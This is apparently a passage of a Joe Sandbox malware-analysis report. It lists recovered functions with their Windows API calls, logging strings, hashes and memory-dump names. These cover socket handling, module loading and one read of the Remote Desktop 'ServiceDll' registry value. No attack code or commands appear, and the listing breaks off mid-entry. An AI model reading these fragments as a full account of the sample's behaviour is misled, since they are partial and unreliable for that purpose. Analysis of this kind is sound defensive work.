[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE126D1485
sock_shutdown, xrefs: 00007FFE126D147E, 00007FFE126D14B0

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 647ec9a6474c3ce2ded0ce020ed30b3c254edba3260fd2ea662633b1e61844fa
Instruction ID: 4ad684ae0597118295869443ff85bc1f59463545a50099df43741b8296f26dae
Opcode Fuzzy Hash: 647ec9a6474c3ce2ded0ce020ed30b3c254edba3260fd2ea662633b1e61844fa
Instruction Fuzzy Hash: 41F0BE60E0CC4B92EF10A72BEC404F92350AF64B70F4445B2D94CA21F0EEECA5468300

Function 00007FFE11EC3DB4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE11EC3DC2

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

GetLastError.KERNEL32 ref: 00007FFE11EC3DEE

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE11EC3DDD
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE11EC3E01
module_load, xrefs: 00007FFE11EC3DD6, 00007FFE11EC3DFA

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 9bdefb8062eca152b0a01fece91af8055a68741610badecb24aaf549b6050509
Instruction ID: 3bde895005e85f58b473c3fc47efec168e9761d7951b3f4a0313849a359d6a8b
Opcode Fuzzy Hash: 9bdefb8062eca152b0a01fece91af8055a68741610badecb24aaf549b6050509
Instruction Fuzzy Hash: 20F05E90E0EF1791FF55A7DBAC446B616585F04BA4B8824B1CC1C16771EE1CB6868300

Function 00007FFE0E16BC64 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0E16BC72

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

GetLastError.KERNEL32 ref: 00007FFE0E16BC9E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0E16BCB1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0E16BC8D
module_load, xrefs: 00007FFE0E16BC86, 00007FFE0E16BCAA

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 204679f2bc6990ee039635e80533796441804ce913d51fdb0f0c30e57cf1dc65
Instruction ID: 8c32586742da992eeab4aa466bec80fbcd74746b55932399cf2c193bb3180154
Opcode Fuzzy Hash: 204679f2bc6990ee039635e80533796441804ce913d51fdb0f0c30e57cf1dc65
Instruction Fuzzy Hash: 22F08260E0D60791FD61B756E8588B41260AF14F84F880433CCDD57B76EF1CA6858340

Function 00007FFE0EB44DF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0EB44E02

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

GetLastError.KERNEL32 ref: 00007FFE0EB44E2E

Strings

module_load, xrefs: 00007FFE0EB44E16, 00007FFE0EB44E3A
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0EB44E1D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0EB44E41

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 686306819c2a09d593eccbd7795ed499a59cbd018ae1df6e3997cc1e30a67803
Instruction ID: 3b06903d357892aa4561999b4a8a638ee9a77d331bb3d14ef4c0ad31fe7b3c3f
Opcode Fuzzy Hash: 686306819c2a09d593eccbd7795ed499a59cbd018ae1df6e3997cc1e30a67803
Instruction Fuzzy Hash: D6F05E91F4A71794F935AF6AB8406B01350AF48B85F480431CD9C17375EE1CA585CB00

Function 00007FFE13382785 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFE133827A6
WSAGetLastError.WS2_32 ref: 00007FFE133827C9

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE133827BB
sock_close, xrefs: 00007FFE133827B4, 00007FFE133827D5
[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE133827DC

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: 6af199e007f7996adef2354847391c1866e0faceae043af5748924d3a34d83d2
Instruction ID: 843f7e7aa909cf5b563231683481478aaac8d4aa1184e2ce2db6903befc2d012
Opcode Fuzzy Hash: 6af199e007f7996adef2354847391c1866e0faceae043af5748924d3a34d83d2
Instruction Fuzzy Hash: CFF01751A08D07CDEA505767EC500B812619F74BB0F5413F2F53EA6AF2AE2CA585C308

Function 00007FFE126D14C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFE126D14E6
WSAGetLastError.WS2_32 ref: 00007FFE126D1509

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126D151C
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFE126D14FB
sock_close, xrefs: 00007FFE126D14F4, 00007FFE126D1515

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: 5c1e49d14630147fd45c250221ae436a73f99f9082e26558f7669a6334cef7e2
Instruction ID: 0a2a793c9a1e41d4a1a783099e82db4d1d2f55d8198fd5730cab2fdbd797e57e
Opcode Fuzzy Hash: 5c1e49d14630147fd45c250221ae436a73f99f9082e26558f7669a6334cef7e2
Instruction Fuzzy Hash: 4CF01790E08E0F82FF10A777AC601F522509FA0B78F1403F1D47E561F1AEDCA5468300

Function 00007FFE0E165DD0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0E165192: RegOpenKeyExA.ADVAPI32 ref: 00007FFE0E1651EC

strlen.MSVCRT ref: 00007FFE0E165E22
strcmp.MSVCRT ref: 00007FFE0E165E57

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 00007FFE0E165E00
termsrv.dll, xrefs: 00007FFE0E165E50
ServiceDll, xrefs: 00007FFE0E165DF9

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: Openstrcmpstrlen
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
API String ID: 679246061-1413152910
Opcode ID: 597314c88170177da13323ae43dc6bbc86ed60a82292b5fff92895f5b433da90
Instruction ID: 76857ac2b398de6ac8b22a0b043e0d6362d1c64ee173341dd348b354be19c4cc
Opcode Fuzzy Hash: 597314c88170177da13323ae43dc6bbc86ed60a82292b5fff92895f5b433da90
Instruction Fuzzy Hash: 2C214F72A1CA8790EF209720E8803FAA362EF90744F840433E6DD465AAEF3CD649C700

Function 00007FFE133826B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE133826DF
WSAGetLastError.WS2_32 ref: 00007FFE133826FD

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

sock_set_blocking, xrefs: 00007FFE1338270D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE13382714

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
Instruction ID: 03c1d703ba9fe8217a6ef3284a535ca0bdde6bc5b59e3ebcb3bcd4b937e6af49
Opcode Fuzzy Hash: 67b81b3e321f83b0a377acde5c8563e56ea9b9e6c9116943a0a0c80d8480ee6b
Instruction Fuzzy Hash: F0F06861E0CD428BF7105B1BE8001695161EBA47B4F5043B1EC3EA3BB4DE7C98868708

Function 00007FFE0E1356D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0E1356FF
WSAGetLastError.WS2_32 ref: 00007FFE0E13571D

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E135734
sock_set_blocking, xrefs: 00007FFE0E13572D

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 1bb1a86083e732082e70f61e6f26960f59807adbd804a3acfd8e422177820506
Instruction ID: f124d82916ac5e47f5abdfbcedc33fe763717c6dac86ef67205d2b66b0c7140d
Opcode Fuzzy Hash: 1bb1a86083e732082e70f61e6f26960f59807adbd804a3acfd8e422177820506
Instruction Fuzzy Hash: 6CF0BBA1F0C602D6F7105779A8005B97261FF84B94F504133EDAE837B4EE7CD94A8701

Function 00007FFE126D13F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE126D141F
WSAGetLastError.WS2_32 ref: 00007FFE126D143D

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

sock_set_blocking, xrefs: 00007FFE126D144D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126D1454

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: fa09b0463edbfd2061fbf53e399055cb70d8a4dc0786267002d6f33b0874ef2f
Instruction ID: ee7c378006e039c3ac3363a5918233a31a0a7b7222566b919fb31cea456aaab8
Opcode Fuzzy Hash: fa09b0463edbfd2061fbf53e399055cb70d8a4dc0786267002d6f33b0874ef2f
Instruction Fuzzy Hash: 6EF04F61B0894A82F710576BBC002B55560AB947B4F5042B2ED6D937F4EDECE9478701

Function 00007FFE11EC3F89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE11EC3FAF
WSAGetLastError.WS2_32 ref: 00007FFE11EC3FCD

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

sock_set_blocking, xrefs: 00007FFE11EC3FDD
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC3FE4

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: b31bedb8392103279b1503e0ed231db2542c646e653bb9ebc1efd82847c8f02a
Instruction ID: 088ef4594d5ee82be3e197ae390a24a54a2d0f50d2f3df1074d0c3b0bfb87581
Opcode Fuzzy Hash: b31bedb8392103279b1503e0ed231db2542c646e653bb9ebc1efd82847c8f02a
Instruction Fuzzy Hash: 75F0FC61F0C95382F720579BBC002BB5178AB84774F545571EC5D837B4DE3CE9468701

Function 00007FFE0E16ACA9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0E16ACCF
WSAGetLastError.WS2_32 ref: 00007FFE0E16ACED

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

sock_set_blocking, xrefs: 00007FFE0E16ACFD
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E16AD04

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 34f6d230b1f557c43f196a0a2afa8808660aff0a6bcf451680a4fb4d396bcae0
Instruction ID: 7e59e7b21cd8c55fecd61dd4ca228c292d755f49c5867b171fa952976750827e
Opcode Fuzzy Hash: 34f6d230b1f557c43f196a0a2afa8808660aff0a6bcf451680a4fb4d396bcae0
Instruction Fuzzy Hash: 69F0F061F0C50397F3205729A8005B966A0BF84BA4F548233EDAE933B5EE3CE846C700

Function 00007FFE0EB41D99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0EB41DBF
WSAGetLastError.WS2_32 ref: 00007FFE0EB41DDD

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

sock_set_blocking, xrefs: 00007FFE0EB41DED
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB41DF4

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 8a5a6a26d74a6a2ae8b6abbd23f733f5fcfdce090074c6ef011ce3d369f758ca
Instruction ID: 21abcc701e80ffd5f0eb717725375078188062b55c16f97ac41762616306da05
Opcode Fuzzy Hash: 8a5a6a26d74a6a2ae8b6abbd23f733f5fcfdce090074c6ef011ce3d369f758ca
Instruction Fuzzy Hash: 4CF09CE2F0C64346F7316F59A80027555A0EB94794F104135EDEE577B4DE7CD8868F00

Function 00007FFE133827EA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1338281A
WSAGetLastError.WS2_32 ref: 00007FFE13382831

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE13382848
tcp_set_nodelay, xrefs: 00007FFE13382841

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
Instruction ID: 20420dc6ecc6e28d202812ce54b3a6e4679dfedf599cbf476a20810c0cac9a6c
Opcode Fuzzy Hash: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
Instruction Fuzzy Hash: A8F09661A089028EE7105B2BF8005A96661FBA87B4F4043B5ED7E93BB4DE7CD54ACB04

Function 00007FFE0E13580A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E13583A
WSAGetLastError.WS2_32 ref: 00007FFE0E135851

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E135868
tcp_set_nodelay, xrefs: 00007FFE0E135861

Memory Dump Source

